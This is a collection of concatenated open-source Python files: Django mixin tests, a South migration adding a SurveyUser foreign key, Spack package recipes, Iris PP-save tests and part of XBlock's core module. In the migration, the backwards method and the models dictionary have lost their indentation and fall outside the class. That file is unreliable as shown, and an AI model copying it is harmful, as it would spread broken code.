        # 'fakemixin' proves dispatch fell through to FakeMixin via super().
        eq_(self.view.dispatch(request), 'fakemixin')
    @raises(PermissionDenied)
    def test_not_staff(self):
        """
        If the user is not staff, raise a PermissionDenied exception.
        """
        request = Mock()
        request.user = UserFactory.create(is_staff=False)
        self.view.dispatch(request)
class UserProfileRequiredMixinTests(TestCase):
    """Tests for BaseUserProfileRequiredMixin's dispatch gating."""
    def setUp(self):
        self.view = FakeView()
    def test_has_profile(self):
        """
        If the user has created a profile, and has accepted privacy policy
        call the parent class's dispatch method.
        """
        request = Mock()
        request.user = UserProfileFactory.create(privacy_policy_accepted=True).user
        # 'fakemixin' proves dispatch fell through to FakeMixin via super().
        eq_(self.view.dispatch(request), 'fakemixin')
    def test_no_profile(self):
        """
        If the user hasn't created a profile, redirect them to the
        profile creation view.
        """
        request = Mock()
        request.user = UserFactory.create()
        with patch('oneanddone.users.mixins.redirect') as redirect:
            eq_(self.view.dispatch(request), redirect.return_value)
            redirect.assert_called_with('users.profile.create')
| bobsilverberg/oneanddone | oneanddone/users/tests/test_mixins.py | Python | mpl-2.0 | 2,289 |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    def forwards(self, orm):
        """Apply: add the nullable FK SurveyUser.oneuser -> auth.User."""
        # Adding field 'SurveyUser.oneuser'
        db.add_column('survey_surveyuser', 'oneuser', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'SurveyUser.oneuser'
db.delete_column('survey_surveyuser', 'oneuser_id')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'survey.extraresponse': {
'Meta': {'object_name': 'ExtraResponse'},
'data': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'participation': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['survey.Participation']", 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']"})
},
'survey.lastresponse': {
'Meta': {'object_name': 'LastResponse'},
'data': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'participation': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['survey.Participation']", 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']", 'unique': 'True'})
},
'survey.localflusurvey': {
'Meta': {'object_name': 'LocalFluSurvey'},
'age_user': ('django.db.models.fields.SmallIntegerField', [], {}),
'data': ('django.db.models.fields.TextField', [], {}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'survey_id': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'surveyuser': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']"})
},
'survey.localprofile': {
'Meta': {'object_name': 'LocalProfile'},
'a_family': ('django.db.models.fields.SmallIntegerField', [], {}),
'a_smoker': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'a_vaccine_current': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'a_vaccine_prev_seasonal': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'a_vaccine_prev_swine': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'birth_date': ('django.db.models.fields.DateField', [], {}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'region': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'sq_date_first': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'sq_date_last': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'sq_num_season': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'sq_num_total': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'surveyuser': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']", 'unique': 'True'}),
'zip_code': ('django.db.models.fields.CharField', [], {'max_length': '5'})
},
'survey.localresponse': {
'Meta': {'object_name': 'LocalResponse'},
'answers': ('django.db.models.fields.TextField', [], {}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'survey_id': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'user_id': ('django.db.models.fields.CharField', [], {'max_length': '36'})
},
'survey.participation': {
'Meta': {'object_name': 'Participation'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'epidb_id': ('django.db.models.fields.CharField', [], {'max_length': '36', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'previous_participation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.Participation']", 'null': 'True'}),
'previous_participation_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'survey': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.Survey']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']"})
},
'survey.profile': {
'Meta': {'object_name': 'Profile'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'survey': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['survey.Survey']", 'null': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']", 'unique': 'True'}),
'valid': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'survey.profilesendqueue': {
'Meta': {'object_name': 'ProfileSendQueue'},
'answers': ('django.db.models.fields.TextField', [], {}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']"}),
'survey_id': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'user_id': ('django.db.models.fields.CharField', [], {'max_length': '36'})
},
'survey.responsesendqueue': {
'Meta': {'object_name': 'ResponseSendQueue'},
'answers': ('django.db.models.fields.TextField', [], {}),
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'participation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.Participation']"}),
'survey_id': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'user_id': ('django.db.models.fields.CharField', [], {'max_length': '36'})
},
'survey.survey': {
'Meta': {'object_name': 'Survey'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'specification': ('django.db.models.fields.TextField', [], {}),
'survey_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'survey.surveyuser': {
'Meta': {'object_name': 'SurveyUser'},
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'global_id': ('django.db.models.fields.CharField', [], {'default': "'c4b8d923-bf27-4a67-90d8-39550680036a'", 'unique': 'True', 'max_length': '36'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_participation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.Participation']", 'null': 'True'}),
'last_participation_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'oneuser': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'user': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'temporary_name'", 'symmetrical': 'False', 'to': "orm['auth.User']"})
}
}
complete_apps = ['survey']
| sbfnk/epiwork-website | apps/survey/migrations/0006_auto__add_field_surveyuser_oneuser.py | Python | agpl-3.0 | 12,365 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PerlSubIdentify(PerlPackage):
    """Retrieve names of code references"""

    homepage = "https://metacpan.org/pod/Sub::Identify"
    url = "http://search.cpan.org/CPAN/authors/id/R/RG/RGARCIA/Sub-Identify-0.14.tar.gz"

    # sha256 lets Spack verify the integrity of the downloaded tarball.
    version('0.14', sha256='068d272086514dd1e842b6a40b1bedbafee63900e5b08890ef6700039defad6f')
| LLNL/spack | var/spack/repos/builtin/packages/perl-sub-identify/package.py | Python | lgpl-2.1 | 547 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Openslide(AutotoolsPackage):
    """OpenSlide reads whole slide image files."""

    homepage = "https://openslide.org/"
    url = "https://github.com/openslide/openslide/releases/download/v3.4.1/openslide-3.4.1.tar.xz"

    version('3.4.1', sha256='9938034dba7f48fadc90a2cdf8cfe94c5613b04098d1348a5ff19da95b990564')

    # Build-time tool for locating the libraries below.
    depends_on('pkgconfig', type='build')
    # Image/format decoding libraries.
    depends_on('openjpeg')
    depends_on('jpeg')
    depends_on('libtiff')
    depends_on('libxml2')
    depends_on('sqlite@3.6:')
    # GLib object system and rendering stack.
    depends_on('glib')
    depends_on('cairo+pdf')
    depends_on('gdk-pixbuf')
| LLNL/spack | var/spack/repos/builtin/packages/openslide/package.py | Python | lgpl-2.1 | 803 |
# (C) British Crown Copyright 2010 - 2017, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip) # noqa
import six
# import iris tests first so that some things can be initialised before importing anything else
import iris.tests as tests
import os
import tempfile
import cf_units
import numpy as np
import iris.coords
import iris.coord_systems
import iris.fileformats.pp
from iris.fileformats.pp import PPField3
from iris.tests import mock
import iris.tests.pp as pp
import iris.util
import iris.tests.stock as stock
def itab_callback(cube, field, filename):
    """Load callback: copy the MOUM header release number and ITAB
    experiment number from the raw PP field onto the cube as scalar
    auxiliary coordinates."""
    extra_coords = (
        ([field.lbrel], 'MOUMHeaderReleaseNumber'),
        ([field.lbexp], 'ExperimentNumber(ITAB)'),
    )
    for points, coord_name in extra_coords:
        cube.add_aux_coord(iris.coords.AuxCoord(points, long_name=coord_name,
                                                units='no_unit'))
@tests.skip_data
class TestPPSave(tests.IrisTest, pp.PPTest):
    """Round-trip tests that save cubes to PP and compare the result
    against stored reference output files."""

    def test_no_forecast_time(self):
        """A cube with only a scalar time coordinate still saves to PP."""
        cube = stock.lat_lon_cube()
        coord = iris.coords.DimCoord(np.array([24], dtype=np.int64),
            standard_name='time',
            units='hours since epoch')
        cube.add_aux_coord(coord)
        self.assertCML(cube, ['cube_to_pp', 'no_forecast_time.cml'])

        reference_txt_path = tests.get_result_path(('cube_to_pp', 'no_forecast_time.txt'))
        with self.cube_save_test(reference_txt_path, reference_cubes=cube) as temp_pp_path:
            iris.save(cube, temp_pp_path)

    def test_no_forecast_period(self):
        """A cube with a bounded time and a forecast_reference_time, but no
        forecast_period, still saves to PP."""
        cube = stock.lat_lon_cube()
        # Add a bounded scalar time coord and a forecast_reference_time.
        time_coord = iris.coords.DimCoord(
            10.958333, standard_name='time',
            units='days since 2013-05-10 12:00',
            bounds=[10.916667, 11.0])
        cube.add_aux_coord(time_coord)
        forecast_reference_time = iris.coords.DimCoord(
            2.0, standard_name='forecast_reference_time',
            units='weeks since 2013-05-07')
        cube.add_aux_coord(forecast_reference_time)

        self.assertCML(cube, ['cube_to_pp', 'no_forecast_period.cml'])
        reference_txt_path = tests.get_result_path(('cube_to_pp',
                                                    'no_forecast_period.txt'))
        with self.cube_save_test(reference_txt_path, reference_cubes=cube) as \
                temp_pp_path:
            iris.save(cube, temp_pp_path)

    def test_pp_save_rules(self):
        # Test pp save rules without user rules.

        #read
        in_filename = tests.get_data_path(('PP', 'simple_pp', 'global.pp'))
        cubes = iris.load(in_filename, callback=itab_callback)

        reference_txt_path = tests.get_result_path(('cube_to_pp', 'simple.txt'))
        with self.cube_save_test(reference_txt_path, reference_cubes=cubes) as temp_pp_path:
            iris.save(cubes, temp_pp_path)

    def test_pp_append_singles(self):
        # Test pp append saving - single cubes.

        # load 2 arrays of >2D cubes
        cube = stock.simple_pp()

        reference_txt_path = tests.get_result_path(('cube_to_pp', 'append_single.txt'))
        with self.cube_save_test(reference_txt_path, reference_cubes=[cube, cube]) as temp_pp_path:
            iris.save(cube, temp_pp_path)               # Create file
            iris.save(cube, temp_pp_path, append=True)  # Append to file

        reference_txt_path = tests.get_result_path(('cube_to_pp', 'replace_single.txt'))
        with self.cube_save_test(reference_txt_path, reference_cubes=cube) as temp_pp_path:
            iris.save(cube, temp_pp_path)  # Create file
            iris.save(cube, temp_pp_path)  # Replace file

    def test_pp_append_lists(self):
        # Test PP append saving - lists of cubes.
        # For each of the first four time-steps in the 4D cube,
        # pull out the bottom two levels.
        cube_4d = stock.realistic_4d()
        cubes = [cube_4d[i, :2, :, :] for i in range(4)]

        reference_txt_path = tests.get_result_path(('cube_to_pp', 'append_multi.txt'))
        with self.cube_save_test(reference_txt_path, reference_cubes=cubes) as temp_pp_path:
            iris.save(cubes[:2], temp_pp_path)
            iris.save(cubes[2:], temp_pp_path, append=True)

        reference_txt_path = tests.get_result_path(('cube_to_pp', 'replace_multi.txt'))
        with self.cube_save_test(reference_txt_path, reference_cubes=cubes[2:]) as temp_pp_path:
            iris.save(cubes[:2], temp_pp_path)
            iris.save(cubes[2:], temp_pp_path)

    def add_coords_to_cube_and_test(self, coord1, coord2):
        # a wrapper for creating arbitrary 2d cross-sections and run pp-saving tests
        dataarray = np.arange(16, dtype='>f4').reshape(4, 4)
        cm = iris.cube.Cube(data=dataarray)

        cm.add_dim_coord(coord1, 0)
        cm.add_dim_coord(coord2, 1)

        # TODO: This is the desired line of code...
        # reference_txt_path = tests.get_result_path(('cube_to_pp', '%s.%s.pp.txt' % (coord1.name(), coord2.name())))
        # ...but this is required during the CF change, to maintain the original filename.
        coord1_name = coord1.name().replace("air_", "")
        coord2_name = coord2.name().replace("air_", "")
        reference_txt_path = tests.get_result_path(('cube_to_pp', '%s.%s.pp.txt' % (coord1_name, coord2_name)))

        # test with name
        with self.cube_save_test(reference_txt_path, reference_cubes=cm,
                field_coords=[coord1.name(), coord2.name()]) as temp_pp_path:
            iris.save(cm, temp_pp_path, field_coords=[coord1.name(), coord2.name()])
        # test with coord
        with self.cube_save_test(reference_txt_path, reference_cubes=cm,
                field_coords=[coord1, coord2]) as temp_pp_path:
            iris.save(cm, temp_pp_path, field_coords=[coord1, coord2])

    def test_non_standard_cross_sections(self):
        #ticket #1037, the five variants being dealt with are
        #    'pressure.latitude',
        #    'depth.latitude',
        #    'eta.latitude',
        #    'pressure.time',
        #    'depth.time',

        f = FakePPEnvironment()

        self.add_coords_to_cube_and_test(
            iris.coords.DimCoord(f.z, long_name='air_pressure', units='hPa', bounds=f.z_bounds),
            iris.coords.DimCoord(f.y, standard_name='latitude', units='degrees', bounds=f.y_bounds, coord_system=f.geog_cs()))

        self.add_coords_to_cube_and_test(
            iris.coords.DimCoord(f.z, long_name='depth', units='m', bounds=f.z_bounds),
            iris.coords.DimCoord(f.y, standard_name='latitude', units='degrees', bounds=f.y_bounds, coord_system=f.geog_cs()))

        self.add_coords_to_cube_and_test(
            iris.coords.DimCoord(f.z, long_name='eta', units='1', bounds=f.z_bounds),
            iris.coords.DimCoord(f.y, standard_name='latitude', units='degrees', bounds=f.y_bounds, coord_system=f.geog_cs()))

        self.add_coords_to_cube_and_test(
            iris.coords.DimCoord(f.z, long_name='air_pressure', units='hPa', bounds=f.z_bounds),
            iris.coords.DimCoord(f.y, standard_name='time', units=cf_units.Unit('days since 0000-01-01 00:00:00', calendar=cf_units.CALENDAR_360_DAY), bounds=f.y_bounds))

        self.add_coords_to_cube_and_test(
            iris.coords.DimCoord(f.z, standard_name='depth', units='m', bounds=f.z_bounds),
            iris.coords.DimCoord(f.y, standard_name='time', units=cf_units.Unit('days since 0000-01-01 00:00:00', calendar=cf_units.CALENDAR_360_DAY), bounds=f.y_bounds))

    def test_365_calendar_export(self):
        # test for 365 day calendar export
        cube = stock.simple_pp()
        new_unit = cf_units.Unit('hours since 1970-01-01 00:00:00',
                                 calendar=cf_units.CALENDAR_365_DAY)
        cube.coord('time').units = new_unit
        # Add an extra "fill_value" property, as used by the save rules.
        cube.fill_value = None
        pp_field = mock.MagicMock(spec=PPField3)
        iris.fileformats.pp_save_rules.verify(cube, pp_field)
        # lbtim.ic == 4 encodes the 365-day calendar in PP headers.
        self.assertEqual(pp_field.lbtim.ic, 4)
class FakePPEnvironment(object):
    ''' fake a minimal PP environment for use in cross-section coords, as in PP save rules '''
    # Coordinate points for the y and z axes of the synthetic cross-section.
    y = [1, 2, 3, 4]
    z = [111, 222, 333, 444]
    # Cell bounds bracketing each point above.
    y_bounds = [[0.9, 1.1], [1.9, 2.1], [2.9, 3.1], [3.9, 4.1]]
    z_bounds = [[110.9, 111.1], [221.9, 222.1], [332.9, 333.1], [443.9, 444.1]]

    def geog_cs(self):
        """Return a GeogCS for this PPField.

        Returns:
            A GeogCS with the appropriate earth shape, meridian and pole position.
        """
        return iris.coord_systems.GeogCS(6371229.0)
class TestPPSaveRules(tests.IrisTest, pp.PPTest):
    """Tests for specific PP save rules: default coordinate systems,
    lbproc process flags and lbvc vertical coordinate encoding."""

    def test_default_coord_system(self):
        GeogCS = iris.coord_systems.GeogCS
        cube = iris.tests.stock.lat_lon_cube()
        reference_txt_path = tests.get_result_path(('cube_to_pp',
                                                    'default_coord_system.txt'))
        # Remove all coordinate systems.
        for coord in cube.coords():
            coord.coord_system = None
        # Ensure no coordinate systems available.
        self.assertIsNone(cube.coord_system(GeogCS))
        self.assertIsNone(cube.coord_system(None))
        with self.cube_save_test(reference_txt_path, reference_cubes=cube) as \
                temp_pp_path:
            # Save cube to PP with no coordinate system.
            iris.save(cube, temp_pp_path)
            pp_cube = iris.load_cube(temp_pp_path)
            # Ensure saved cube has the default coordinate system.
            self.assertIsInstance(pp_cube.coord_system(GeogCS),
                                  iris.coord_systems.GeogCS)
            self.assertIsNotNone(pp_cube.coord_system(None))
            self.assertIsInstance(pp_cube.coord_system(None),
                                  iris.coord_systems.GeogCS)
            self.assertIsNotNone(pp_cube.coord_system())
            self.assertIsInstance(pp_cube.coord_system(),
                                  iris.coord_systems.GeogCS)

    def lbproc_from_pp(self, filename):
        # Gets the lbproc field from the ppfile
        pp_file = iris.fileformats.pp.load(filename)
        field = next(pp_file)
        return field.lbproc

    def test_pp_save_rules(self):
        # Test single process flags
        for _, process_desc in iris.fileformats.pp.LBPROC_PAIRS[1:]:
            # Get basic cube and set process flag manually
            ll_cube = stock.lat_lon_cube()
            ll_cube.attributes["ukmo__process_flags"] = (process_desc,)

            # Save cube to pp
            temp_filename = iris.util.create_temp_filename(".pp")
            iris.save(ll_cube, temp_filename)

            # Check the lbproc is what we expect
            self.assertEqual(self.lbproc_from_pp(temp_filename),
                             iris.fileformats.pp.lbproc_map[process_desc])

            os.remove(temp_filename)

        # Test mutiple process flags
        multiple_bit_values = ((128, 64), (4096, 1024), (8192, 1024))

        # Maps lbproc value to the process flags that should be created
        multiple_map = {sum(bits) : [iris.fileformats.pp.lbproc_map[bit] for bit in bits] for bits in multiple_bit_values}

        for lbproc, descriptions in six.iteritems(multiple_map):
            ll_cube = stock.lat_lon_cube()
            ll_cube.attributes["ukmo__process_flags"] = descriptions

            # Save cube to pp
            temp_filename = iris.util.create_temp_filename(".pp")
            iris.save(ll_cube, temp_filename)

            # Check the lbproc is what we expect
            self.assertEqual(self.lbproc_from_pp(temp_filename), lbproc)

            os.remove(temp_filename)

    @tests.skip_data
    def test_lbvc(self):
        cube = stock.realistic_4d_no_derived()[0, :4, ...]

        v_coord = iris.coords.DimCoord(standard_name='depth',
                                       units='m', points=[-5, -10, -15, -20])

        # Replace the model-level vertical coords with a plain depth coord.
        cube.remove_coord('level_height')
        cube.remove_coord('sigma')
        cube.remove_coord('surface_altitude')
        cube.add_aux_coord(v_coord, 0)

        # Expected (lbvc, lblev, blev) triples: lbvc=2 encodes depth.
        expected = ([2, 1, -5.0],
                    [2, 2, -10.0],
                    [2, 3, -15.0],
                    [2, 4, -20.0])

        for field, (lbvc, lblev, blev) in zip(fields_from_cube(cube), expected):
            self.assertEqual(field.lbvc, lbvc)
            self.assertEqual(field.lblev, lblev)
            self.assertEqual(field.blev, blev)
def fields_from_cube(cubes):
    """
    Save the given cube(s) to a temporary PP file, then load that file
    back and yield each resulting PP field in turn.

    """
    with tempfile.NamedTemporaryFile('w+b', suffix='.pp') as tmp_file:
        # On Python 2 iris.save needs the underlying file object.
        file_handle = tmp_file.file if six.PY2 else tmp_file
        iris.save(cubes, file_handle, saver='pp')

        # Flush Python's buffer and the OS cache so the loader sees the
        # complete data, then rewind to the start of the file.
        file_handle.flush()
        os.fsync(file_handle)
        file_handle.seek(0)

        # load in the saved pp fields and check the appropriate metadata
        for pp_field in iris.fileformats.pp.load(tmp_file.name):
            yield pp_field
if __name__ == "__main__":
    # Allow this test module to be executed directly.
    tests.main()
| LukeC92/iris | lib/iris/tests/test_cube_to_pp.py | Python | lgpl-3.0 | 14,217 |
"""
Core classes for the XBlock family.
This code is in the Runtime layer, because it is authored once by edX
and used by all runtimes.
"""
import inspect
import pkg_resources
import warnings
from collections import defaultdict
from xblock.exceptions import DisallowedFileError
from xblock.fields import String, List, Scope
from xblock.internal import class_lazy
import xblock.mixins
from xblock.mixins import (
ScopedStorageMixin,
HierarchyMixin,
RuntimeServicesMixin,
HandlersMixin,
XmlSerializationMixin,
IndexInfoMixin,
ViewsMixin,
)
from xblock.plugin import Plugin
from xblock.validation import Validation
# exposing XML_NAMESPACES as a member of core, in order to avoid importing mixins where
# XML_NAMESPACES are needed (e.g. runtime.py).
XML_NAMESPACES = xblock.mixins.XML_NAMESPACES

# __all__ controls what classes end up in the docs.
__all__ = ['XBlock']

# Sentinel default value: lets XBlock.__init__ distinguish "argument was
# omitted" from an explicit None.
UNSET = object()
class XBlockMixin(ScopedStorageMixin):
    """
    Base class for XBlock Mixin classes.

    XBlockMixin classes can add new fields and new properties to all XBlocks
    created by a particular runtime.

    """
    # Intentionally empty: serves purely as a marker/base for runtime mixins.
    pass
class SharedBlockBase(Plugin):
    """
    Behaviors and attrs which all XBlock like things should share
    """

    @classmethod
    def open_local_resource(cls, uri):
        """Open a static resource bundled with this XBlock's package.

        The container calls this with the URI originally produced by
        ``Runtime.local_resource_url()`` and expects an open file-like
        object back.

        For security, this default implementation serves only files that
        live under a ``public/`` folder and whose path contains no dotted
        components (which rules out ``..`` traversal and ``.hidden``
        files).  Subclasses overriding this must take equivalent care not
        to expose unauthorized resources.
        """
        # The checks run in this order so a URI outside public/ reports
        # that error first, even if it also contains a dotted component.
        validations = (
            (not uri.startswith("public/"),
             "Only files from public/ are allowed: %r" % uri),
            ("/." in uri,
             "Only safe file names are allowed: %r" % uri),
        )
        for failed, message in validations:
            if failed:
                raise DisallowedFileError(message)
        return pkg_resources.resource_stream(cls.__module__, uri)
# -- Base Block
class XBlock(XmlSerializationMixin, HierarchyMixin, ScopedStorageMixin, RuntimeServicesMixin, HandlersMixin,
             IndexInfoMixin, ViewsMixin, SharedBlockBase):
    """Base class for XBlocks.

    Derive from this class to create a new kind of XBlock.  There are no
    required methods, but you will probably need at least one view.

    Don't provide the ``__init__`` method when deriving from this class.

    """
    entry_point = 'xblock.v1'

    # Fields common to every XBlock, stored in the settings scope.
    name = String(help="Short name for the block", scope=Scope.settings)
    tags = List(help="Tags for this block", scope=Scope.settings)

    @class_lazy
    def _class_tags(cls):  # pylint: disable=no-self-argument
        """
        Collect the tags from all base classes.
        """
        class_tags = set()

        # Walk the MRO (excluding this class itself) and merge each
        # ancestor's tag set.
        for base in cls.mro()[1:]:  # pylint: disable=no-member
            class_tags.update(getattr(base, '_class_tags', set()))

        return class_tags

    @staticmethod
    def tag(tags):
        """Returns a function that adds the words in `tags` as class tags to this class."""
        def dec(cls):
            """Add the words in `tags` as class tags to this class."""
            # Add in this class's tags
            cls._class_tags.update(tags.replace(",", " ").split())  # pylint: disable=protected-access
            return cls
        return dec

    @classmethod
    def load_tagged_classes(cls, tag, fail_silently=True):
        """
        Produce a sequence of all XBlock classes tagged with `tag`.

        fail_silently causes the code to simply log warnings if a
        plugin cannot import. The goal is to be able to use part of
        libraries from an XBlock (and thus have it installed), even if
        the overall XBlock cannot be used (e.g. depends on Django in a
        non-Django application). There is diagreement about whether
        this is a good idea, or whether we should see failures early
        (e.g. on startup or first page load), and in what
        contexts. Hence, the flag.
        """
        # Allow this method to access the `_class_tags`
        # pylint: disable=W0212
        for name, class_ in cls.load_classes(fail_silently):
            if tag in class_._class_tags:
                yield name, class_

    def __init__(self, runtime, field_data=None, scope_ids=UNSET, *args, **kwargs):
        """
        Construct a new XBlock.

        This class should only be instantiated by runtimes.

        Arguments:

            runtime (:class:`.Runtime`): Use it to access the environment.
                It is available in XBlock code as ``self.runtime``.

            field_data (:class:`.FieldData`): Interface used by the XBlock
                fields to access their data from wherever it is persisted.
                Deprecated.

            scope_ids (:class:`.ScopeIds`): Identifiers needed to resolve
                scopes.

        """
        # UNSET (not None) marks "omitted", so an explicit None still errors.
        if scope_ids is UNSET:
            raise TypeError('scope_ids are required')

        # Provide backwards compatibility for external access through _field_data
        super(XBlock, self).__init__(runtime=runtime, scope_ids=scope_ids, field_data=field_data, *args, **kwargs)

    def render(self, view, context=None):
        """Render `view` with this block's runtime and the supplied `context`"""
        return self.runtime.render(self, view, context)

    def validate(self):
        """
        Ask this xblock to validate itself. Subclasses are expected to override this
        method, as there is currently only a no-op implementation. Any overriding method
        should call super to collect validation results from its superclasses, and then
        add any additional results as necessary.
        """
        return Validation(self.scope_ids.usage_id)
class XBlockAside(XmlSerializationMixin, ScopedStorageMixin, RuntimeServicesMixin, HandlersMixin, SharedBlockBase):
    """
